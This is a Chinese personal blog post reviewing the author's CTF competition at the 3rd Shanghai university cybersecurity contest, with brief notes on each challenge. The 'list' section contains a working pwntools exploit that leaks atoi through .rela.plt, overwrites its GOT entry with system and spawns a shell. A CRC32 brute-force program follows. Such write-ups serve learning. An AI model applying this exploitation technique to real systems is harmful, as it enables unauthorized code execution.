BetaMao

第三届上海市大学生网络安全大赛-总结

字数统计: 1.6k阅读时长: 7 min
2017/11/11 Share

给自己看的一点比赛的总结与反思~

比赛都结束一周啦,之所以现在才写是因为之前一直在医院躺着,才出来啊不过这次的比赛还是有写的必要的,因为这几个月来参加的全都是浪费时间的比赛,这次的总算是有点收获

Some Words

我没看,知道有人SQLmap跑出来表名,不知道最后能不能把所有信息拿到,看他们做觉得还是需要平时多写些通用脚本,那样速度会快很多。

Welcome To My Blog

非常有意思的一道题,宁宁说秒做,于是我也去试了下,看到url后面有个action=情不自禁加了个flag然后,200婚~

Step By Step

robots.txt里面说了源码位置,下下来是加密过的,作为人民币玩家(逃,百度了下,花了7.5把它解出来了,本来还剩3元,结果忘记账号了,虽然据说后来官方说了可以不用花钱,但是我们这时已经做出来了(smail cry),解密后就简单了,爆破随机种子再考下弱类型什么的
好呗,附上免费的脚本:http://sec2hack.com/web/phpjiami-decode.html

juckcode

逐位爆破这种方式,以后别忘了(嗯,我没有看这道题..

classical

还以为是enigma,后来学弟试了下base64编码flag再移位,和它很像,于是就是咯
(要是线下断网没有这个词频分析网站就GG了,吓得我赶紧去找下离线的脚本)

rrrsa

不是我做的,只想说队友需要补点姿势,不然这次可能就进去了,超时1分钟做出来~

list

只能说自己学艺不精,很早就发现低地址读写与利用atoi得shell了,但是怎么都找不到跳板,卡死在这里,看wp才想起来rel有元素是指向got的,气!

分析

利用的是这三个函数:



stringCount可以向下越界,而stringTables存的是地址,需要一个指向目标的地址,当时就死在这里了。

利用

万万没想到,.rel.pltr_offset域指向了got,于是通过它泄露一个地址并且写入一个地址,使用readelf获取这个地址:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  Downloads readelf -x .rela.plt list 

Hex dump of section '.rela.plt':
0x00400510 18206000 00000000 07000000 01000000 . `.............
0x00400520 00000000 00000000 20206000 00000000 ........ `.....
0x00400530 07000000 02000000 00000000 00000000 ................
0x00400540 28206000 00000000 07000000 03000000 ( `.............
0x00400550 00000000 00000000 30206000 00000000 ........0 `.....
0x00400560 07000000 04000000 00000000 00000000 ................
0x00400570 38206000 00000000 07000000 07000000 8 `.............
0x00400580 00000000 00000000 40206000 00000000 ........@ `.....
0x00400590 07000000 08000000 00000000 00000000 ................
0x004005a0 48206000 00000000 07000000 09000000 H `.............
0x004005b0 00000000 00000000 ........

➜ Downloads

于是就可以写出利用代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python
# coding=utf-8
from pwn import *

elf = ELF('list')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p = process('list')
atoiRelPltAddr = 0x00400588
stringTables = 0x000000000602080
stringCount = 0

##低地址读
def readAddr(count):
for i in range(count):
p.recv()
p.sendline('4')
if i%10000==0:
print i
print p.recv()
p.sendline('2')
lala = p.recv(8)
lala = lala[:lala.find('\n')]+'\x00'*(len(lala)-lala.find('\n'))
print lala
addr = u64(lala)
return addr

##低地址写
def writeAddr(data,count):
for i in range(count):
p.recv()
p.sendline('4')
# gdb.attach(p)
p.sendline('3')
p.send(p64(data))

##泄露出atoi地址
stringCount = (stringTables - atoiRelPltAddr)/8 - stringCount
print stringCount
atoiAddr = readAddr(stringCount)
print hex(atoiAddr)

##计算出system
systemAddr = atoiAddr - (libc.symbols['atoi']-libc.symbols['system'])
print hex(systemAddr)

##将system写入atoi
writeAddr(systemAddr,0)

## 调用它
p.send('/bin/sh\0')
p.interactive()

结果:

p200

提示的很明显了是个uaf,然鹅看到c++代码就怂了,知道这道题很简单就是不敢做,好气哦!

登机牌

这道题,告诉自己要注意给的每一个细节,还有网站很重要,似乎只有这个网站能识别成功!

clemency

哎,知道这是传说中的中端序、9bit,然鹅入坑里了,以为是给的程序运行时会读取flag.enc文件然后进行解密,使用模拟器调试,又是读指令集最后还是没弄出来,结果太气啦,后来看wp,直接用ida的就可以弄出来了。

流量分析

第一次遇到这种流量分析,其实满屏的tls也是够可疑的,看wp是这样做的:
因为tls目的就是传输过程中加密,抓包是不能获取密码的,但是ftp-data里面有给每次通信的key,导入就可以解密关键的通信了,那里面有个是传zip,将其导出,是个音频,结尾杂音频谱还是啥的就能看到密码,再解压获得的flag.zip即可:

crc32

不是上次的题,只是今天队友遇到了,py太慢就找了个C的,稍作修改,然后记在这里吧~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
# include<string.h>
# include <stdio.h>

//来自:https://github.com/ETrun/crc32/blob/master/crc32.c
static unsigned long Crc32_ComputeBuf(const void *buf, size_t bufLen) {
static const unsigned long crcTable[256] = {
0x00000000,0x77073096,0xEE0E612C,0x990951BA,0x076DC419,0x706AF48F,0xE963A535,
0x9E6495A3,0x0EDB8832,0x79DCB8A4,0xE0D5E91E,0x97D2D988,0x09B64C2B,0x7EB17CBD,
0xE7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0xF3B97148,0x84BE41DE,0x1ADAD47D,
0x6DDDE4EB,0xF4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0xFD62F97A,0x8A65C9EC,
0x14015C4F,0x63066CD9,0xFA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0xD56041E4,
0xA2677172,0x3C03E4D1,0x4B04D447,0xD20D85FD,0xA50AB56B,0x35B5A8FA,0x42B2986C,
0xDBBBC9D6,0xACBCF940,0x32D86CE3,0x45DF5C75,0xDCD60DCF,0xABD13D59,0x26D930AC,
0x51DE003A,0xC8D75180,0xBFD06116,0x21B4F4B5,0x56B3C423,0xCFBA9599,0xB8BDA50F,
0x2802B89E,0x5F058808,0xC60CD9B2,0xB10BE924,0x2F6F7C87,0x58684C11,0xC1611DAB,
0xB6662D3D,0x76DC4190,0x01DB7106,0x98D220BC,0xEFD5102A,0x71B18589,0x06B6B51F,
0x9FBFE4A5,0xE8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0xE10E9818,0x7F6A0DBB,
0x086D3D2D,0x91646C97,0xE6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0xF262004E,
0x6C0695ED,0x1B01A57B,0x8208F4C1,0xF50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,
0xFCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0xFBD44C65,0x4DB26158,0x3AB551CE,
0xA3BC0074,0xD4BB30E2,0x4ADFA541,0x3DD895D7,0xA4D1C46D,0xD3D6F4FB,0x4369E96A,
0x346ED9FC,0xAD678846,0xDA60B8D0,0x44042D73,0x33031DE5,0xAA0A4C5F,0xDD0D7CC9,
0x5005713C,0x270241AA,0xBE0B1010,0xC90C2086,0x5768B525,0x206F85B3,0xB966D409,
0xCE61E49F,0x5EDEF90E,0x29D9C998,0xB0D09822,0xC7D7A8B4,0x59B33D17,0x2EB40D81,
0xB7BD5C3B,0xC0BA6CAD,0xEDB88320,0x9ABFB3B6,0x03B6E20C,0x74B1D29A,0xEAD54739,
0x9DD277AF,0x04DB2615,0x73DC1683,0xE3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,
0xE40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0xF00F9344,0x8708A3D2,0x1E01F268,
0x6906C2FE,0xF762575D,0x806567CB,0x196C3671,0x6E6B06E7,0xFED41B76,0x89D32BE0,
0x10DA7A5A,0x67DD4ACC,0xF9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0xD6D6A3E8,
0xA1D1937E,0x38D8C2C4,0x4FDFF252,0xD1BB67F1,0xA6BC5767,0x3FB506DD,0x48B2364B,
0xD80D2BDA,0xAF0A1B4C,0x36034AF6,0x41047A60,0xDF60EFC3,0xA867DF55,0x316E8EEF,
0x4669BE79,0xCB61B38C,0xBC66831A,0x256FD2A0,0x5268E236,0xCC0C7795,0xBB0B4703,
0x220216B9,0x5505262F,0xC5BA3BBE,0xB2BD0B28,0x2BB45A92,0x5CB36A04,0xC2D7FFA7,
0xB5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0xEC63F226,0x756AA39C,0x026D930A,
0x9C0906A9,0xEB0E363F,0x72076785,0x05005713,0x95BF4A82,0xE2B87A14,0x7BB12BAE,
0x0CB61B38,0x92D28E9B,0xE5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0xF1D4E242,
0x68DDB3F8,0x1FDA836E,0x81BE16CD,0xF6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,
0xFF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0xF862AE69,0x616BFFD3,0x166CCF45,
0xA00AE278,0xD70DD2EE,0x4E048354,0x3903B3C2,0xA7672661,0xD06016F7,0x4969474D,
0x3E6E77DB,0xAED16A4A,0xD9D65ADC,0x40DF0B66,0x37D83BF0,0xA9BCAE53,0xDEBB9EC5,
0x47B2CF7F,0x30B5FFE9,0xBDBDF21C,0xCABAC28A,0x53B39330,0x24B4A3A6,0xBAD03605,
0xCDD70693,0x54DE5729,0x23D967BF,0xB3667A2E,0xC4614AB8,0x5D681B02,0x2A6F2B94,
0xB40BBE37,0xC30C8EA1,0x5A05DF1B,0x2D02EF8D
};
unsigned long crc32 = 0xFFFFFFFF;
unsigned char *byteBuf;
size_t i;

byteBuf = (unsigned char*)buf;
for (i = 0; i < bufLen; i++) {
crc32 = (crc32 >> 8) ^ crcTable[(crc32 ^ byteBuf[i]) & 0xFF];
}
return crc32 ^ 0xFFFFFFFF;
}

static char *charSet = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_@\n ";


int main() {
unsigned long crc32[] = { 1606238046, 1943531056, 3598719407L, 2578797435L, 1405086858, 2143805016, 3234701029L, 3224637410L,
2346013297L, 1146766327, 4038678768L, 3119445409L, 2111148220, 383413051, 2853461348L, 3176759361L, 1852520927,
3083243303L, 2151747034L, 1392140456, 544449252, 1871340857, 574988077, 3459049483L, 2786065872L, 3888485555L,
1716930793, 1933746678, 3178216769L, 3774357278L, 622718466, 1488109481, 525106857, 3123386181L, 3472027048L,
616379830, 3728848209L, 1358333123, 1852520927, 3096466191L, 622718466
};

char tmp[6] = "";
int len = strlen(charSet);
for (int h = sizeof(crc32) / sizeof(unsigned long) - 1;h>=0; h--) {
for (int a = 0; a < len; a++) {
tmp[0] = charSet[a];
for (int b = 0; b < len; b++) {
tmp[1] = charSet[b];
for (int c = 0; c < len; c++) {
tmp[2] = charSet[c];
for (int d = 0; d < len; d++) {
tmp[3] = charSet[d];
for (int e = 0; e < len; e++) {
tmp[4] = charSet[e];
if (Crc32_ComputeBuf(tmp, strlen(tmp)) == crc32[h]) {
printf("%s", tmp);
//goto label; //若是存在碰撞,那么这里可以将这里注释掉
}
}
}
}
}
}
label : ;
printf("\n");
}
return 0;
}
CATALOG
  1. 1. Some Words
  2. 2. Welcome To My Blog
  3. 3. Step By Step
  4. 4. juckcode
  5. 5. classical
  6. 6. rrrsa
  7. 7. list
    1. 7.1. 分析
    2. 7.2. 利用
  8. 8. p200
  9. 9. 登机牌
  10. 10. clemency
  11. 11. 流量分析
  12. 12. crc32